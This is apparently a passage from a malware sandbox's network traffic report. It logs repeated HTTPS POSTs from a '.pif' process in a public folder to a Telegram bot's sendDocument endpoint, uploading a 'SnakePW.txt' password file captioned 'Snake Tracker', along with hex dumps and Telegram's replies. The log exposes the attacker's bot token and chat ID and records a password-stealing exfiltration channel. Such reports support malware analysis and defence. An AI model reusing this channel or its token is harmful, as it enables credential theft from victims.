                                                                                                                2024-11-26 07:26:25 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389002,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                83192.168.2.749987149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:24 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10354bf3d436
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 33 35 34 62 66 33 64 34 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10354bf3d436Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:25 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:25 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389004,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                84192.168.2.749988149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:24 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd112bbdaca27c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:24 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 32 62 62 64 61 63 61 32 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd112bbdaca27cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:25 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:25 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389006,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605985,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                85192.168.2.749994149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:26 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10564b4229a8
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:26 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 35 36 34 62 34 32 32 39 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10564b4229a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:31 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:31 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389009,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                86192.168.2.749995149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:26 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd105de7de44b5
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:26 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 35 64 65 37 64 65 34 34 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd105de7de44b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:31 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:31 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389008,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                87192.168.2.749996149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:27 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11703916c344
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:27 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 37 30 33 39 31 36 63 33 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd11703916c344Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:31 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:31 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:31 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389011,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605991,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                88192.168.2.750009149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:33 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10ec2ab08ceb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:33 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 65 63 32 61 62 30 38 63 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10ec2ab08cebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:33 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:33 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389014,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                89192.168.2.750010149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:33 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10f104b8c903
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:33 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 66 31 30 34 62 38 63 39 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd10f104b8c903Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:33 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
